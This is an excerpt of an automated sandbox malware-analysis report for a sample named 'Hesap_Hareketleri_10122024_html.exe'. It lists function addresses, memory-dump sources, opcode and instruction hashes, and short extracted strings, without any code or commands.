Opcode Fuzzy Hash: 2a1a3ab3bcb3ebf3e5cf32ce3b63f14d6bf1cbd56b8e9482d23307fdfc060995
Instruction Fuzzy Hash: 6BD05BF033C304CBC54836A4579EB757996D782711F00406150CB462C6DDF2BCD0C2D6

Function 0727B8F8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1325ffebd5f22da28c567204ae6e9c4c2964c4e62ab74633ec75edbada47cce6
Instruction ID: 50b3bec742f2fe5f8b491f270f35716558e46845aff082378d202001485c8799
Opcode Fuzzy Hash: 1325ffebd5f22da28c567204ae6e9c4c2964c4e62ab74633ec75edbada47cce6
Instruction Fuzzy Hash: 52D05EE0F3C10DEB4250AAD9A74923A7AE8E74B221F004842A82BC3705D9F11B00CFF3

Function 0727AE9B Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c821d707c9bbb4fedde3c3b2a7a047b20310f014d1b102182dd855d32e7cf30e
Instruction ID: 5291269dda195134c1fe11a3d891bf94915a488fb581bcb715822a86391fd226
Opcode Fuzzy Hash: c821d707c9bbb4fedde3c3b2a7a047b20310f014d1b102182dd855d32e7cf30e
Instruction Fuzzy Hash: E8E01AB1D296858FC705CF79C9966AABFB2BE42204B18D0EBD0649B126C7345456CB82

Function 0727C0D7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05cb3196392ca539071e1be447cf080eccf030c66b30c1fdbad1b788584291b6
Instruction ID: c6c87413ea7625eaeaef184c5e024325a9928684f929a4475a7d75af31e7c198
Opcode Fuzzy Hash: 05cb3196392ca539071e1be447cf080eccf030c66b30c1fdbad1b788584291b6
Instruction Fuzzy Hash: FCD012E0678148DB87209AB46721275369EEB87347F10C557A507E7644C9B149D0C6E3

Function 07270DF3 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3d51e6cfcb0db77a95a33ecbfbbcff331a2b8abcf032b80aff4bd5cf440d590
Instruction ID: 4193d0a810476300c5464b4b82c118483875d0623818eea6eab559568e7acab9
Opcode Fuzzy Hash: f3d51e6cfcb0db77a95a33ecbfbbcff331a2b8abcf032b80aff4bd5cf440d590
Instruction Fuzzy Hash: CEE0EC7191060DDECB50EF79DA495AE7BE8AB05214F00C52AE9499A111E630D2D8CB81

Function 0727B059 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ad3fb3f5242d434de01a4efdfda228de9bc5408dc05b5046ee434fb4693c31
Instruction ID: 4d4ecfccda29c22afba732363bfe9d6b5f77b210765a7de21a8558e3666579f1
Opcode Fuzzy Hash: 83ad3fb3f5242d434de01a4efdfda228de9bc5408dc05b5046ee434fb4693c31
Instruction Fuzzy Hash: 1FD05EA4F38148ABE304EFB19C5467F2AE3B788711F50C4696842873C4DD7088018E91

Function 07270DF8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90c5e10a7507ff168547fc3f1fd2c2020cd3c504c65229f5a7bf5e334825e79f
Instruction ID: 61ee3417456d263a88b679754d98e944d464fac23e6d4b398e5f2c73b9c42db7
Opcode Fuzzy Hash: 90c5e10a7507ff168547fc3f1fd2c2020cd3c504c65229f5a7bf5e334825e79f
Instruction Fuzzy Hash: 4EE0127191060DDECB50EF74D60459E7BE8AB05210F00C53AE94D9A110F630D2D8CFC1

Function 072720D8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fff90a1101edf2ff885a3d44422bec0e68cce5c1fafefcd9cbbd980236c50d6e
Instruction ID: 826b0b4ee57883f44a8a3c6f7d6630a45ee508f1558a2565ed113b9ca6f44e6f
Opcode Fuzzy Hash: fff90a1101edf2ff885a3d44422bec0e68cce5c1fafefcd9cbbd980236c50d6e
Instruction Fuzzy Hash: EED0A7307042058793002FF3A8053BA33DEFB806023418015E609C6185CF38D841D721

Function 07276681 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1219f780bdc1f988b6bb2dcfdf89c3743d9c98e60bddd620eb59715970969e8b
Instruction ID: 1750364d13a60d8359f51e0ddabf5150f05062366918af490ae82218dcc154c5
Opcode Fuzzy Hash: 1219f780bdc1f988b6bb2dcfdf89c3743d9c98e60bddd620eb59715970969e8b
Instruction Fuzzy Hash: 95D0C9A289D2D85EC32712B079165E73F34890216174F04CBE4888E493D51D4491C392

Function 0727C0A0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0b2d7f504f76bb8a010991eea9f2b1e4f210797bf47fb55da4ae832c7268045
Instruction ID: cd5f6edec5cc176f03526034ee75484fd7347e5eec76de5627e499a351ac527f
Opcode Fuzzy Hash: c0b2d7f504f76bb8a010991eea9f2b1e4f210797bf47fb55da4ae832c7268045
Instruction Fuzzy Hash: DEC012E123C608CB800099B82B2853D3A9DEB8B203F604406910B82142EAF248C0C5FB

Function 0727E318 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27069891795de75b808b78a6099dba16a9369255d4fae72493014088441d1ed0
Instruction ID: 0c60068532eb32c3915ec4b0604743f2fe1a63da1b844b4e967baeb3bdca0454
Opcode Fuzzy Hash: 27069891795de75b808b78a6099dba16a9369255d4fae72493014088441d1ed0
Instruction Fuzzy Hash: 3FC08CB0411205CBC20427DCEA0F7287F686B0030AF800020F14D824208E745840CAA1

Function 0727C2F0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 828b9dce516c812d8830c5bb681d2ad55aaa70e813b64c5fc3864ad5b6584a39
Instruction ID: bcdb349b7be23c062218dfb03c19b1148b2e5d3a4c88223a56247c772f311ea6
Opcode Fuzzy Hash: 828b9dce516c812d8830c5bb681d2ad55aaa70e813b64c5fc3864ad5b6584a39
Instruction Fuzzy Hash: B0B012E403C60CC3050031F433292353E5C7307A04F100012B50F318010FF114D1C0B3

Function 0727BCB0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76aa2a47c52805337a758a51a00c8bee406617dc07fdde3be8fdc11fdbec469c
Instruction ID: 4872ed457a2b5e23360fafbe66f61b1f7626a4e0394cfb0aa524bc4ae5385b55
Opcode Fuzzy Hash: 76aa2a47c52805337a758a51a00c8bee406617dc07fdde3be8fdc11fdbec469c
Instruction Fuzzy Hash: 04C012F2828190CFC302CBA6CE96A543FE0AE1A20038808CAC0059B322E220E010CB04

Function 0727770C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a7435cff8d654f5da1357396785b10af3192128c1beb969e68f0ee500421f77
Instruction ID: e7b4258d97c319d020c0c63b8ad5f4b90685bd21e75810782fe35754ca758749
Opcode Fuzzy Hash: 7a7435cff8d654f5da1357396785b10af3192128c1beb969e68f0ee500421f77
Instruction Fuzzy Hash: B6B012F51BD600E3540163BC4E85D3EA860FFF2702F80CD05334810034D9714428D317

Function 0727B9C1 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adf945ac959c76ffbce1ee7685f159b50adca9071b2b0e19dede87cf2921749c
Instruction ID: a726641e82bb556cd373c058e5f7d369a0f0edbce5ce12a3ddac91661c7fd73f
Opcode Fuzzy Hash: adf945ac959c76ffbce1ee7685f159b50adca9071b2b0e19dede87cf2921749c
Instruction Fuzzy Hash: 84C04CF0B71219EFDB118A91DF47A6C7A756B06A05F504924F61267194D6B04A01CA44

Function 07276690 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82a86919c0748fc6e9cb2c9519a67e017aebb11eca9c5dcfed048fcef08ace7
Instruction ID: 258ddc1725b2fba06ca51ace6d33c25fdc4f9ffea9e955d90e9232294ea82d55
Opcode Fuzzy Hash: a82a86919c0748fc6e9cb2c9519a67e017aebb11eca9c5dcfed048fcef08ace7
Instruction Fuzzy Hash: 4FA011E0038B0CCA02082282A20A33A3F3CA002208B80800CF80A080022ABEB820C088

Non-executed Functions

Function 070D3A51 Relevance: 6.7, Strings: 5, Instructions: 452COMMON

Download Yara Rule

Strings

Hgq, xrefs: 070D3F68
(ocq, xrefs: 070D3EFB
(ocq, xrefs: 070D3EF1
,gq, xrefs: 070D3C8F
,gq, xrefs: 070D3C7F

Memory Dump Source

Source File: 00000001.00000002.2334679453.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70d0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$,gq$,gq$Hgq
API String ID: 0-1029698136
Opcode ID: 801577683ef7229ce72785ee54154a521b8371a25c0bec73a994002cd912681a
Instruction ID: e3baf2dd84be0dfa885a0f51b57b1238207631f35094804152f859c79104bb70
Opcode Fuzzy Hash: 801577683ef7229ce72785ee54154a521b8371a25c0bec73a994002cd912681a
Instruction Fuzzy Hash: 3B021CB5A00715DFCB58CF69C49896EFBF2BF89610B198259E816DB3A1CB31EC01CB51

Function 07B33440 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

TA%*, xrefs: 07B3349B

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: TA%*
API String ID: 0-658225455
Opcode ID: b310f08958109d0b1482fc54b774f061df439bc495163afb4d23c5c39fbc1ded
Instruction ID: 5f0d0148c34fb5131d503bf62b18e214c190135add679f8998d5103ce0332a9a
Opcode Fuzzy Hash: b310f08958109d0b1482fc54b774f061df439bc495163afb4d23c5c39fbc1ded
Instruction Fuzzy Hash: 58E1F6B4E041198FDB14DFA9C5809AEBBF2FF89305F24C169E414AB356DB34A981CF61

Function 07B33430 Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

TA%*, xrefs: 07B3349B

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: TA%*
API String ID: 0-658225455
Opcode ID: b17d3ee2c966e76a04a2ce01947450a2a84494a1b925f4b1b48ea8b37a275288
Instruction ID: cdabd40f7251a1b85baa4131b888e5d48dbb64dc4f492ac7c20b1ff91211dac7
Opcode Fuzzy Hash: b17d3ee2c966e76a04a2ce01947450a2a84494a1b925f4b1b48ea8b37a275288
Instruction Fuzzy Hash: F15139B0E042198FDB14CFA9C5805AEFBF2FF89301F24C1AAD418A7256D7359A41CF61

Function 070D1230 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

d, xrefs: 070D138B

Memory Dump Source

Source File: 00000001.00000002.2334679453.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70d0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 61b8dea20183b0a172286b5c15940a099691b679a4c2395d6f95bd02a7e5b3ec
Instruction ID: 2814ca856633cb00fda183adeb607b0c0eb8e81e8ead22227f1bdc5922c3713b
Opcode Fuzzy Hash: 61b8dea20183b0a172286b5c15940a099691b679a4c2395d6f95bd02a7e5b3ec
Instruction Fuzzy Hash: E351D3B1E04629CFDB25DF66CC447DEBBB2AB89301F40C1EAD418A7254DB355A86CF81

Function 07B34B18 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec36878c47c27a9c5db31669097ac2d3c4e157fdbbb3e2734cf4084b58905263
Instruction ID: 8daa9c2220afced95af0e701a883e452bc980ced3b5e4f0461d06341a5a4a800
Opcode Fuzzy Hash: ec36878c47c27a9c5db31669097ac2d3c4e157fdbbb3e2734cf4084b58905263
Instruction Fuzzy Hash: 0CE107B4E141598FDB14DFA8C5809AEBBF2FF89305F24C169E404AB356DB34A981CF61

Function 07B34F50 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec9e30538ca4fa52197d70c5d4241cdea1b5c1e5b68dcd6041bbb1f30931196
Instruction ID: 374cb61dae4c5f0227963ab3146d516d99d51767857b7d2b071d10744365e90b
Opcode Fuzzy Hash: cec9e30538ca4fa52197d70c5d4241cdea1b5c1e5b68dcd6041bbb1f30931196
Instruction Fuzzy Hash: 37E1F6B4E002198FDB14DFA9C5809AEBBF2FF89305F24C169E414AB355D735A981CFA1

Function 07B33008 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f298adafd95cd48e1c175c36c17825b22f93a1ca01e670ca1df8dbdb491a55c
Instruction ID: 57ccf46c8e15977c41b43ced6617bf0610300928d0d539963e1bd876240d5b37
Opcode Fuzzy Hash: 5f298adafd95cd48e1c175c36c17825b22f93a1ca01e670ca1df8dbdb491a55c
Instruction Fuzzy Hash: F5E105B4E101198FDB14DFA9C580AAEBBF2FF89305F24C169E404AB355DB34A981CF61

Function 07B33878 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97d5c5ce878462e639401b12a01a194ee3adcc6c00f6a19b75b9da6665f5a7fa
Instruction ID: a9ae2f13bf1d819859e7281239db8678ba11918032436eb8a695008652ee5a4e
Opcode Fuzzy Hash: 97d5c5ce878462e639401b12a01a194ee3adcc6c00f6a19b75b9da6665f5a7fa
Instruction Fuzzy Hash: C5E107B4E042198FDB14DFA9C5809AEBBF2FF89305F24C169E414AB355DB34A981CF61

Function 024FE124 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2312047012.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24f0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05b644dbb676907883af071184b982408aab60b344286a000cbecd62374451e4
Instruction ID: 7ce308a9b95158e9a652dbd6e9cc06ed0644848a5ff0bbc543b37fd67438ea7a
Opcode Fuzzy Hash: 05b644dbb676907883af071184b982408aab60b344286a000cbecd62374451e4
Instruction Fuzzy Hash: 25A17E32E006058FCF09DFB6C94059EB7B2FFC5305B15856AE905AB2A5DB31E959CF80

Analysis Process: Hesap_Hareketleri_10122024_html.exePID: 7200, Parent PID: 2212COMMON

Executed Functions

Function 02B37118 Relevance: 6.6, Strings: 5, Instructions: 349COMMON

Download Yara Rule

Strings

(ocq, xrefs: 02B3753D
(ocq, xrefs: 02B37220
,gq, xrefs: 02B37298
(ocq, xrefs: 02B37212
,gq, xrefs: 02B3728A

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$(ocq$,gq$,gq
API String ID: 0-2430754052
Opcode ID: 025a6e0a0434dff88d0a2bd2a90c6e2b0ec780f5c2f1fba464b08174e87f8329
Instruction ID: 84fbeb77a7af330e3612b0ef63e03da02263541cbeb8d5e5be121925b8eb9d97
Opcode Fuzzy Hash: 025a6e0a0434dff88d0a2bd2a90c6e2b0ec780f5c2f1fba464b08174e87f8329
Instruction Fuzzy Hash: 7CE13DB1A00119DFCB16CFA8C984AADFBF2FF89354F598095E845AB265DB30EC41DB50

Function 02B35362 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

PHcq, xrefs: 02B355D9
0oFp, xrefs: 02B353E2
LjFp, xrefs: 02B35550
LjFp, xrefs: 02B35566
PHcq, xrefs: 02B355C8

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 416606244262bb22e43f98a9480bc5d6ee0ed60d56bc3e2e1adee3a9299d6092
Instruction ID: d986930773aa66db9885564c4081327fd5ddf5d4755996f67cde3dff1244bfc1
Opcode Fuzzy Hash: 416606244262bb22e43f98a9480bc5d6ee0ed60d56bc3e2e1adee3a9299d6092
Instruction Fuzzy Hash: 9381C374E00218CFDB19DFA9D984A9DBBF2FF88300F5580A9D819AB365DB349985CF50

Function 02B3C468 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

LjFp, xrefs: 02B3C647
0oFp, xrefs: 02B3C4DA
PHcq, xrefs: 02B3C6BF
LjFp, xrefs: 02B3C65D
PHcq, xrefs: 02B3C6D0

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 16117cfaa9331d5f907a35cd208a776b0eb2b7150d7de2478950d8d9ea817c7f
Instruction ID: d4d914bb31ca7bfe265fd7318000de901fb1ae10f3040934e4ab97550dc83817
Opcode Fuzzy Hash: 16117cfaa9331d5f907a35cd208a776b0eb2b7150d7de2478950d8d9ea817c7f
Instruction Fuzzy Hash: 7A81B374E00218DFDB15DFA9D944A9DBBF2BF89300F1490AAD419AB365DB349981CF50

Function 02B3CA08 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

0oFp, xrefs: 02B3CA7A
LjFp, xrefs: 02B3CBE7
LjFp, xrefs: 02B3CBFD
PHcq, xrefs: 02B3CC5F
PHcq, xrefs: 02B3CC70

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 78210ea84da466c39f5a6027cb6042cdcbe61c49eb586c6036214622f013da56
Instruction ID: 493be1f8c71e7888cee2734069bf620ea11c3b5424ef9814746f46d02c3b1bba
Opcode Fuzzy Hash: 78210ea84da466c39f5a6027cb6042cdcbe61c49eb586c6036214622f013da56
Instruction Fuzzy Hash: B9819474E00218DFDB55DFA9D844A9DBBF2BF89300F14C0AAE419AB365DB349981CF50

Function 02B3D278 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

LjFp, xrefs: 02B3D457
0oFp, xrefs: 02B3D2EA
PHcq, xrefs: 02B3D4CF
PHcq, xrefs: 02B3D4E0
LjFp, xrefs: 02B3D46D

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 43afebf589e1d58ffec3809e1360dfb44ff89a2ff7b27d3cc2dfe3a9a9a1b849
Instruction ID: 5241a17caa5a934997a5731916444c2586effe19ce4ff1140477b9966d820d0b
Opcode Fuzzy Hash: 43afebf589e1d58ffec3809e1360dfb44ff89a2ff7b27d3cc2dfe3a9a9a1b849
Instruction Fuzzy Hash: 0C81B374E00218CFDB59DFA9D984A9DBBF2BF89310F14C0A9E419AB365DB349981CF50

Function 02B3C19A Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

LjFp, xrefs: 02B3C38D
PHcq, xrefs: 02B3C3EF
LjFp, xrefs: 02B3C377
0oFp, xrefs: 02B3C20A
PHcq, xrefs: 02B3C400

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: eddd87ab5ed6343fe0ce6bec54d7cfe355ebcac2af1f6e2da5e9a82da2661302
Instruction ID: c1f652984009196d8f3bdfe1e47bdaf93d836137192d4e41c22384576ded90a0
Opcode Fuzzy Hash: eddd87ab5ed6343fe0ce6bec54d7cfe355ebcac2af1f6e2da5e9a82da2661302
Instruction Fuzzy Hash: 1B81A274E00218CFDB55DFAAD944A9DBBF2BF89300F14C0AAE419AB365DB349981CF50

Function 02B3C738 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

PHcq, xrefs: 02B3C98F
LjFp, xrefs: 02B3C917
PHcq, xrefs: 02B3C9A0
LjFp, xrefs: 02B3C92D
0oFp, xrefs: 02B3C7AA

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: a3e66b9a4fad93d91b250b9ad0b4a7f2d4f6676cd11cfa0f46e2541a58158bf8
Instruction ID: 796192cb4582ebc20bded4c2898cf11e6eb285579b26749e8481c75584202e7f
Opcode Fuzzy Hash: a3e66b9a4fad93d91b250b9ad0b4a7f2d4f6676cd11cfa0f46e2541a58158bf8
Instruction Fuzzy Hash: 5381B374E00218CFDB15DFAAD984A9DBBF2BF88300F15C0AAD419AB365DB349981CF50

Function 02B3CCD8 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

LjFp, xrefs: 02B3CEB7
0oFp, xrefs: 02B3CD4A
LjFp, xrefs: 02B3CECD
PHcq, xrefs: 02B3CF2F
PHcq, xrefs: 02B3CF40

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 3123d5a811f382a861d5c539d4414f80523db1f3b8f34b57476883d8574ecdda
Instruction ID: b924771afd2a6a4149a7c72778c67f54be13ff494140f99f8c00f7d12f1c0449
Opcode Fuzzy Hash: 3123d5a811f382a861d5c539d4414f80523db1f3b8f34b57476883d8574ecdda
Instruction Fuzzy Hash: 5A81A374E00218DFDB55DFA9D944A9DBBF2BF88300F14C0AAE419AB365DB34A985CF50

Function 02B3CFAA Relevance: 6.4, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

PHcq, xrefs: 02B3D210
LjFp, xrefs: 02B3D19D
LjFp, xrefs: 02B3D187
0oFp, xrefs: 02B3D01A
PHcq, xrefs: 02B3D1FF

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
